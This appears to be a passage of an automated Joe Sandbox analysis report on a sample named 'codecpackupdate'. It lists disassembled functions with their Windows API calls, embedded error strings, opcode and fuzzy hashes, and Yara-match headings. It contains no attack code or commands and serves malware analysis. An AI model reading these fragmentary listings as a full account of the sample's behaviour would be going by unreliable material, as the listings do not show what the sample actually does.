                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 3074076210-2104205924
                                                                          • Opcode ID: 550f082a58580fb72499b684be47a46c16d6476fde09130410b826262cc7a2fb
                                                                          • Instruction ID: 12fd7651247a4f79e6d985203b064b2a38fa40a1a5c0053cc2e1b9a8c1704b29
                                                                          • Opcode Fuzzy Hash: 550f082a58580fb72499b684be47a46c16d6476fde09130410b826262cc7a2fb
                                                                          • Instruction Fuzzy Hash: E0E0657194020EABDF10FF64ED05EEFBB7CAF04350F504555B814A55D1EF729B449690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F37B6
                                                                          • __localtime64.LIBCMT ref: 009F37C1
                                                                            • Part of subcall function 00A02540: __gmtime64_s.LIBCMT ref: 00A02553
                                                                          • std::exception::exception.LIBCMT ref: 009F37D9
                                                                            • Part of subcall function 00A02413: std::exception::_Copy_str.LIBCMT ref: 00A0242C
                                                                            • Part of subcall function 009FA45B: __EH_prolog.LIBCMT ref: 009FA460
                                                                            • Part of subcall function 009FA45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009FA46F
                                                                            • Part of subcall function 009FA45B: __CxxThrowException@8.LIBCMT ref: 009FA48E
                                                                          Strings
                                                                          • could not convert calendar time to UTC time, xrefs: 009F37CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                          • String ID: could not convert calendar time to UTC time
                                                                          • API String ID: 1963798777-2088861013
                                                                          • Opcode ID: f1c9cfae941f773d90b04e003e748bac4effbb57fb06577e0ffa5e323fbae2bc
                                                                          • Instruction ID: 8f27fea0cfcb079070aa3e668a3d33c52b9211185e703504602985b79ed5cc83
                                                                          • Opcode Fuzzy Hash: f1c9cfae941f773d90b04e003e748bac4effbb57fb06577e0ffa5e323fbae2bc
                                                                          • Instruction Fuzzy Hash: 1FE06DB1C0460EDACB00EFA0D9057FEB778EB04304F004569E825A2591EB7956468B95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual$FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 714016831-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AdjustPointer_memmove
                                                                          • String ID:
                                                                          • API String ID: 1721217611-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,009F4149), ref: 00A012FF
                                                                            • Part of subcall function 009F3FDC: __EH_prolog.LIBCMT ref: 009F3FE1
                                                                            • Part of subcall function 009F3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 009F3FF3
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A012F4
                                                                          • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,009F4149), ref: 00A01340
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,009F4149), ref: 00A01411
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$Event$CreateH_prolog
                                                                          • String ID:
                                                                          • API String ID: 2825413587-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A0FE8B
                                                                          • __isleadbyte_l.LIBCMT ref: 00A0FEB9
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 00A0FEE7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 00A0FF1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                          • String ID:
                                                                          • API String ID: 3058430110-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • htons.WS2_32(?), ref: 009F3DA2
                                                                            • Part of subcall function 009F3BD3: __EH_prolog.LIBCMT ref: 009F3BD8
                                                                            • Part of subcall function 009F3BD3: std::bad_exception::bad_exception.LIBCMT ref: 009F3BED
                                                                          • htonl.WS2_32(00000000), ref: 009F3DB9
                                                                          • htonl.WS2_32(00000000), ref: 009F3DC0
                                                                          • htons.WS2_32(?), ref: 009F3DD4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                          • String ID:
                                                                          • API String ID: 3882411702-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 009F23D0
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F23DE
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F2401
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F2408
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 4018804020-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ___BuildCatchObject.LIBCMT ref: 00A0BC84
                                                                            • Part of subcall function 00A0C29B: ___AdjustPointer.LIBCMT ref: 00A0C2E4
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00A0BC9B
                                                                          • ___FrameUnwindToState.LIBCMT ref: 00A0BCAD
                                                                          • CallCatchBlock.LIBCMT ref: 00A0BCD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009F24A9
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F24B8
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F24CD
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F24D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                          • String ID:
                                                                          • API String ID: 4018804020-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F2009
                                                                          • RtlDeleteCriticalSection.NTDLL(?), ref: 009F2028
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F2037
                                                                          • CloseHandle.KERNEL32(00000000), ref: 009F204E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                          • String ID:
                                                                          • API String ID: 2456309408-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Event$H_prologSleep
                                                                          • String ID:
                                                                          • API String ID: 1765829285-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmove
                                                                          • String ID: &'
                                                                          • API String ID: 3529519853-655172784
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Info
                                                                          • String ID: $
                                                                          • API String ID: 1807457897-3032137957
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,009F8306,?,?,00000000), ref: 009F9603
                                                                          • getsockname.WS2_32(?,?,?), ref: 009F9619
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastgetsockname
                                                                          • String ID: &'
                                                                          • API String ID: 566540725-655172784
                                                                          • Opcode ID: c3cba1759fe51b055d5a5b5be311e9bffc557db33e81f6e710bd545b356126a5
                                                                          • Instruction ID: ea05416dc2fe7bf5606affba7a4f4e27d78baaf38aff725df006844262fd4975
                                                                          • Opcode Fuzzy Hash: c3cba1759fe51b055d5a5b5be311e9bffc557db33e81f6e710bd545b356126a5
                                                                          • Instruction Fuzzy Hash: 9F2151B6A04208DFDB10DF68D845ADEB7F5FF4C324F11816AF918EB281D734A9458B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FCBE7
                                                                            • Part of subcall function 009FD1C3: std::exception::exception.LIBCMT ref: 009FD1F2
                                                                            • Part of subcall function 009FD979: __EH_prolog.LIBCMT ref: 009FD97E
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 009FD222: __EH_prolog.LIBCMT ref: 009FD227
                                                                          Strings
                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009FCC24
                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 009FCC1D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                          • API String ID: 1953324306-1943798000
                                                                          • Opcode ID: 836d7793ae79bc07347c09127427de6f824681edda1d4f6186481f4a72d55f3c
                                                                          • Instruction ID: d300f6f8d0049d4f50e2d4434b0ababc3509f870f155d1cd1feea58348aabf67
                                                                          • Opcode Fuzzy Hash: 836d7793ae79bc07347c09127427de6f824681edda1d4f6186481f4a72d55f3c
                                                                          • Instruction Fuzzy Hash: A221CC71E0621CEADB14EBE8E955BFDBBB8AF54304F00401DF905AB281CB745A85CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FCCDC
                                                                            • Part of subcall function 009FD29A: std::exception::exception.LIBCMT ref: 009FD2C7
                                                                            • Part of subcall function 009FDAB0: __EH_prolog.LIBCMT ref: 009FDAB5
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 009FD2F7: __EH_prolog.LIBCMT ref: 009FD2FC
                                                                          Strings
                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 009FCD19
                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 009FCD12
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                          • API String ID: 1953324306-412195191
                                                                          • Opcode ID: 572be9ed19b01ccd30b0b89c9bd83918a22b60b802ddfc51126138686f59cc6b
                                                                          • Instruction ID: 33ba2f176dfec6b041bf34ad6ab784507167575642c8428f6a9fab1cb2c6441b
                                                                          • Opcode Fuzzy Hash: 572be9ed19b01ccd30b0b89c9bd83918a22b60b802ddfc51126138686f59cc6b
                                                                          • Instruction Fuzzy Hash: 4B218D71D052589ADB14EFE8D851BFDBBB8EF54300F00412DFA05AB291DBB49A45C791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 009F535D
                                                                            • Part of subcall function 00A02EEC: __FF_MSGBANNER.LIBCMT ref: 00A02F03
                                                                            • Part of subcall function 00A02EEC: __NMSG_WRITE.LIBCMT ref: 00A02F0A
                                                                            • Part of subcall function 00A02EEC: RtlAllocateHeap.NTDLL(008F0000,00000000,00000001), ref: 00A02F2F
                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 009F536F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                          • String ID: \save.dat
                                                                          • API String ID: 4128168839-3580179773
                                                                          • Opcode ID: 6f7a8a38876fd0d215adc97b331dfd8e740ac3859c91477e3e4c830bcf2377a8
                                                                          • Instruction ID: 5445d399280768d5c660155a135afde97bdf17fdfdac98cecaad80d709d2af7e
                                                                          • Opcode Fuzzy Hash: 6f7a8a38876fd0d215adc97b331dfd8e740ac3859c91477e3e4c830bcf2377a8
                                                                          • Instruction Fuzzy Hash: ED117D325042487BDF218E699C819AFFF6FDF82790B1542A8F94467242D6E30D02C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F396A
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F39C1
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009FA551: __EH_prolog.LIBCMT ref: 009FA556
                                                                            • Part of subcall function 009FA551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 009FA565
                                                                            • Part of subcall function 009FA551: __CxxThrowException@8.LIBCMT ref: 009FA584
                                                                          Strings
                                                                          • Day of month is not valid for year, xrefs: 009F39AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month is not valid for year
                                                                          • API String ID: 1404951899-1521898139
                                                                          • Opcode ID: 7bea77ecb473877c3e4b04949e98f3af106f24c00b554a8904ba0c9b2052aac0
                                                                          • Instruction ID: ce790ced31b66ff3d48f2938e2dbb7e70e884109102b68336589f2e6d88b276c
                                                                          • Opcode Fuzzy Hash: 7bea77ecb473877c3e4b04949e98f3af106f24c00b554a8904ba0c9b2052aac0
                                                                          • Instruction Fuzzy Hash: 8501717681420DEACF04EFA4D806AFEB778FF98710F40841AFD14A7250EB758A95C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • std::exception::exception.LIBCMT ref: 009FFA4A
                                                                          • __CxxThrowException@8.LIBCMT ref: 009FFA5F
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                          • String ID: bad allocation
                                                                          • API String ID: 4063778783-2104205924
                                                                          • Opcode ID: 75e771aaf039d619e9075de5eb6bc15319924ae1bdf75b5fd3029ba35536eb9e
                                                                          • Instruction ID: 6c7a8e7296a5ed9fc14d1d713bf58019a3f6f671a6d9e3cc90e28c4d18ccfb77
                                                                          • Opcode Fuzzy Hash: 75e771aaf039d619e9075de5eb6bc15319924ae1bdf75b5fd3029ba35536eb9e
                                                                          • Instruction Fuzzy Hash: D9F0A77060030D6BDF14EFA8DD559FF77ECAB04351B500529BA25E26C1EFB1EA048694
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3C1B
                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 009F3C30
                                                                            • Part of subcall function 00A023F7: std::exception::exception.LIBCMT ref: 00A02401
                                                                            • Part of subcall function 009FA58A: __EH_prolog.LIBCMT ref: 009FA58F
                                                                            • Part of subcall function 009FA58A: __CxxThrowException@8.LIBCMT ref: 009FA5B8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                          • String ID: bad cast
                                                                          • API String ID: 1300498068-3145022300
                                                                          • Opcode ID: 357f8bb49eaf75c18500e56de0787003d7ccd558c8d8040794c72ddda8c25b17
                                                                          • Instruction ID: c5042a009c2449d6f6a298b9cd65f0eec3ea73c6faab030964808159c2e0e71e
                                                                          • Opcode Fuzzy Hash: 357f8bb49eaf75c18500e56de0787003d7ccd558c8d8040794c72ddda8c25b17
                                                                          • Instruction Fuzzy Hash: 71F0A072D00908DBC709EF58E551AEAF774EF95311F10406EFE095B281CB729A56CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F3886
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F38A5
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          Strings
                                                                          • Day of month value is out of range 1..31, xrefs: 009F3894
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Day of month value is out of range 1..31
                                                                          • API String ID: 3258419250-1361117730
                                                                          • Opcode ID: 35148fc60ce893d24b0f9021329d059aa629541476f5546f423ba18c7c8f8a9e
                                                                          • Instruction ID: d1888c46320fa95c9466d318484b8a5ddc342a69f00770ae028b7d4609d20636
                                                                          • Opcode Fuzzy Hash: 35148fc60ce893d24b0f9021329d059aa629541476f5546f423ba18c7c8f8a9e
                                                                          • Instruction Fuzzy Hash: F2E09232E04108EBD714ABA4C812BECB778EB88750F40055AE90177280DBB6198087D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F38D2
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F38F1
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          Strings
                                                                          • Year is out of valid range: 1400..10000, xrefs: 009F38E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Year is out of valid range: 1400..10000
                                                                          • API String ID: 3258419250-2344417016
                                                                          • Opcode ID: c6bec337283798929ed900c34a8bcdef3bad3c4286181a26c29f694666585424
                                                                          • Instruction ID: 11587acac0498b9dd9eca9ae52137673e98b54e056188e7fd5e50ce12e7ee494
                                                                          • Opcode Fuzzy Hash: c6bec337283798929ed900c34a8bcdef3bad3c4286181a26c29f694666585424
                                                                          • Instruction Fuzzy Hash: 06E09A72E48208ABDB18EBA8C812BECB768EB88750F00055AE94167280DBB61984C795
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F391E
                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 009F393D
                                                                            • Part of subcall function 009F1410: std::exception::exception.LIBCMT ref: 009F1428
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          Strings
                                                                          • Month number is out of range 1..12, xrefs: 009F392C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                          • String ID: Month number is out of range 1..12
                                                                          • API String ID: 3258419250-4198407886
                                                                          • Opcode ID: 01dd4becfdac2483481b733aaa647d12c5a6e42d9393dd8e98b915a53c67605c
                                                                          • Instruction ID: 50de21c6124499a63fbb46b2f4c6245d7a4d7677481398e6c278a031777668f4
                                                                          • Opcode Fuzzy Hash: 01dd4becfdac2483481b733aaa647d12c5a6e42d9393dd8e98b915a53c67605c
                                                                          • Instruction Fuzzy Hash: D1E09A32E08218ABD718BBA8C812BEDB768EB88750F00055AE90167280DBB2298087D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • TlsAlloc.KERNEL32 ref: 009F19CC
                                                                          • GetLastError.KERNEL32 ref: 009F19D9
                                                                            • Part of subcall function 009F1712: __EH_prolog.LIBCMT ref: 009F1717
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
